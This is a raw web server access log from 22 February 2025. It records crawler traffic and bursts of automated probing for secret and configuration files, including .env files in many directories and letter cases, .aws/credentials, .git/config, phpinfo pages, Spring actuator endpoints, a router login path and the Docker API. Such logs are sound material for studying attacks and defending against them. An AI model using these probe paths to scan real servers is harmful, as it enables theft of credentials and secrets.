156.59.198.135 - - [22/Feb/2025:12:20:50 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10742312.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [22/Feb/2025:12:29:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.207 - - [22/Feb/2025:12:29:23 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
92.255.57.58 - - [22/Feb/2025:12:36:34 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.39 - - [22/Feb/2025:13:19:34 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.39 - - [22/Feb/2025:13:19:35 +0100] "\x16\x03\x01" 400 383 "-" "-"
141.255.166.90 - - [22/Feb/2025:13:28:07 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
46.19.143.26 - - [22/Feb/2025:13:28:53 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
220.80.66.179 - - [22/Feb/2025:13:36:18 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [22/Feb/2025:13:49:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12202242.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [22/Feb/2025:13:50:57 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.135 - - [22/Feb/2025:13:57:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105101403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:14:01:21 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-fr.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
69.176.89.94 - - [22/Feb/2025:14:04:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1"
193.68.89.10 - - [22/Feb/2025:14:13:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.166.90 - - [22/Feb/2025:14:18:50 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
92.255.57.58 - - [22/Feb/2025:14:24:39 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Feb/2025:14:27:19 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001692.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
68.183.95.185 - - [22/Feb/2025:14:33:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
68.183.95.185 - - [22/Feb/2025:14:33:46 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (compatible)"
68.183.95.185 - - [22/Feb/2025:14:33:47 +0100] "GET /ads.txt HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible)"
194.50.16.252 - - [22/Feb/2025:14:53:32 +0100] "GET /config/env HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.24"
194.50.16.252 - - [22/Feb/2025:14:53:34 +0100] "GET /config/actuator/env HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
194.50.16.252 - - [22/Feb/2025:14:53:35 +0100] "GET /gatway/env HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.24"
198.235.24.181 - - [22/Feb/2025:14:57:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
175.201.53.210 - - [22/Feb/2025:14:58:04 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
109.205.213.198 - - [22/Feb/2025:14:58:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.153.140.151 - - [22/Feb/2025:15:06:02 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Redmi Note 5 Pro Build/NGI77B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:02 +0100] "GET /backend/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; BRI/1; MAEM; .NET4.0C; FunWebProducts; BRI/2)"
78.153.140.151 - - [22/Feb/2025:15:06:03 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.151 - - [22/Feb/2025:15:06:04 +0100] "GET /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
78.153.140.151 - - [22/Feb/2025:15:06:04 +0100] "GET /admin/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; yie11; rv:11.0) like Gecko"
78.153.140.151 - - [22/Feb/2025:15:06:11 +0100] "GET /info/ HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.151 - - [22/Feb/2025:15:06:12 +0100] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:13 +0100] "GET /?phpinfo=-1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
78.153.140.151 - - [22/Feb/2025:15:06:14 +0100] "GET /.env.example HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
78.153.140.151 - - [22/Feb/2025:15:06:15 +0100] "GET /phpinfo.php HTTP/1.1" 200 62923 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)"
78.153.140.151 - - [22/Feb/2025:15:06:22 +0100] "GET /.env.production HTTP/1.1" 404 360 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)"
78.153.140.151 - - [22/Feb/2025:15:06:22 +0100] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 374 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.5.21022; .NET4.0C; Media Center PC 5.0; SLCC1; Tablet PC 2.0; BRI/1; .NET4.0E; EIE10;ENUSWOL)"
78.153.140.151 - - [22/Feb/2025:15:06:22 +0100] "GET /demo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071103 Firefox/2.0.0.9"
78.153.140.151 - - [22/Feb/2025:15:06:23 +0100] "GET /app/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 5.0; Android SDK built for x86 Build/LRX09D) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:26 +0100] "GET /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/546.10 (KHTML, like Gecko) Version/6.0 Mobile/7E18WD Safari/8536.25"
78.153.140.151 - - [22/Feb/2025:15:06:27 +0100] "GET /.aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P5110 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.151 - - [22/Feb/2025:15:06:27 +0100] "GET /Application/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1"
78.153.140.151 - - [22/Feb/2025:15:06:27 +0100] "GET /laravel/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8"
78.153.140.151 - - [22/Feb/2025:15:06:27 +0100] "GET /settings/.env HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; InfoPath.3)"
78.153.140.151 - - [22/Feb/2025:15:06:27 +0100] "GET /home/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux x86; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
78.153.140.151 - - [22/Feb/2025:15:06:28 +0100] "GET /aws.yml HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12"
78.153.140.151 - - [22/Feb/2025:15:06:28 +0100] "GET /_static/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG-SGH-I337 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:28 +0100] "GET /www/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SGH-I317 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.151 - - [22/Feb/2025:15:06:29 +0100] "GET /system/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:30 +0100] "GET /.env.development HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:30 +0100] "GET /app/config/parameters.yml HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Linux; Android 4.4.2; ARCHOS 50c Neon Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:30 +0100] "GET /php-info.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 3.2; en-ca; GT-P7500R Build/HTJ85B) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13"
78.153.140.151 - - [22/Feb/2025:15:06:32 +0100] "GET /local/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.4 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.4"
78.153.140.151 - - [22/Feb/2025:15:06:33 +0100] "GET /build/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061001 Firefox/2.0b (Swiftfox)"
78.153.140.151 - - [22/Feb/2025:15:06:36 +0100] "GET /component/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
78.153.140.151 - - [22/Feb/2025:15:06:39 +0100] "GET /controller/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SPH-L900 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.151 - - [22/Feb/2025:15:06:40 +0100] "GET /counterblockd/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
78.153.140.151 - - [22/Feb/2025:15:06:41 +0100] "GET /dashboard/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko)"
78.153.140.151 - - [22/Feb/2025:15:06:41 +0100] "GET /enviroments/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6"
78.153.140.151 - - [22/Feb/2025:15:06:43 +0100] "GET /extensions/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
141.255.166.90 - - [22/Feb/2025:15:07:52 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
47.128.50.187 - - [22/Feb/2025:15:13:13 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.97.221 - - [22/Feb/2025:15:17:17 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.177 - - [22/Feb/2025:15:18:07 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Opera/9.80 (Windows NT 6.1; Edition Yx) Presto/2.12.388 Version/12.16"
78.153.140.177 - - [22/Feb/2025:15:18:09 +0100] "GET /.ENV HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 925) like Gecko"
78.153.140.177 - - [22/Feb/2025:15:18:10 +0100] "GET /.Env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
78.153.140.177 - - [22/Feb/2025:15:18:12 +0100] "GET /.AWS/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.61 Mobile/12H143 Safari/600.1.4"
78.153.140.177 - - [22/Feb/2025:15:18:12 +0100] "GET /.AWS/CREDENTIALS HTTP/1.1" 404 361 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D23 Safari/602.1"
78.153.140.177 - - [22/Feb/2025:15:18:12 +0100] "GET /.Aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; RCT6272W23 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.177 - - [22/Feb/2025:15:18:12 +0100] "GET /.CONFIG.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.3; de-de; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [22/Feb/2025:15:18:15 +0100] "GET /.Config.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.3; zh-tw; C6602 Build/10.4.1.B.0.101) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [22/Feb/2025:15:18:17 +0100] "GET /.env.BAK HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-T580 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 OPR/44.1.2246.123029"
78.153.140.177 - - [22/Feb/2025:15:18:20 +0100] "GET /.ENV.example HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16"
78.153.140.177 - - [22/Feb/2025:15:18:21 +0100] "GET /.env.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
78.153.140.177 - - [22/Feb/2025:15:18:21 +0100] "GET /.ENV.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
78.153.140.177 - - [22/Feb/2025:15:18:27 +0100] "GET /ADMIN/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36"
78.153.140.177 - - [22/Feb/2025:15:18:30 +0100] "GET /Admin/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1"
78.153.140.177 - - [22/Feb/2025:15:18:35 +0100] "GET /Application/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13"
78.153.140.177 - - [22/Feb/2025:15:18:36 +0100] "GET /APPLICATION/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 OPR/41.0.2353.69"
78.153.140.177 - - [22/Feb/2025:15:18:37 +0100] "GET /BACKEND/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13"
78.153.140.177 - - [22/Feb/2025:15:18:38 +0100] "GET /Config/.env HTTP/1.1" 404 356 "-" "Opera/9.20 (Macintosh; Intel Mac OS X; U; en)"
78.153.140.177 - - [22/Feb/2025:15:18:38 +0100] "GET /CONFIG/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36"
78.153.140.177 - - [22/Feb/2025:15:18:39 +0100] "GET /Core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; fr-fr) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
78.153.140.177 - - [22/Feb/2025:15:18:39 +0100] "GET /CORE/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 OPR/25.0.1614.71"
78.153.140.177 - - [22/Feb/2025:15:18:39 +0100] "GET /Cp/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.5.9 (de)"
78.153.140.177 - - [22/Feb/2025:15:18:40 +0100] "GET /CP/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Zetakey/3.2"
78.153.140.177 - - [22/Feb/2025:15:18:40 +0100] "GET /Credentials HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.153.140.177 - - [22/Feb/2025:15:18:41 +0100] "GET /CREDENTIALS HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17"
78.153.140.177 - - [22/Feb/2025:15:18:41 +0100] "GET /Crm/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
78.153.140.177 - - [22/Feb/2025:15:18:41 +0100] "GET /CRM/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36"
78.153.140.177 - - [22/Feb/2025:15:18:41 +0100] "GET /Data/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
78.153.140.177 - - [22/Feb/2025:15:18:42 +0100] "GET /DATA/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (iPad; CPU OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B440 Safari/600.1.4"
46.19.143.26 - - [22/Feb/2025:15:33:31 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
193.68.89.10 - - [22/Feb/2025:15:44:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Feb/2025:15:46:53 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951665.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:15:55:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911181303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:16:04:18 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_f/awstats-tt-br.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:16:08:21 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-se.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [22/Feb/2025:16:14:44 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
156.59.198.136 - - [22/Feb/2025:16:42:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10535028.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:16:46:15 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-en.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:16:46:35 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [22/Feb/2025:16:50:15 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_f/awstats-tt-cz.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
101.201.45.148 - - [22/Feb/2025:17:02:41 +0100] "GET /containers/json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
195.178.110.163 - - [22/Feb/2025:17:07:13 +0100] "\x16\x03\x01" 400 383 "-" "-"
195.178.110.163 - - [22/Feb/2025:17:07:13 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
195.178.110.163 - - [22/Feb/2025:17:07:13 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
195.178.110.163 - - [22/Feb/2025:17:07:16 +0100] "GET /config/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
195.178.110.163 - - [22/Feb/2025:17:07:17 +0100] "GET /dev/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
156.59.198.135 - - [22/Feb/2025:17:10:17 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10839804.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:17:14:18 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_f/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:17:18:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109091203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:17:22:17 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11182002.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:17:26:18 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-nl.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
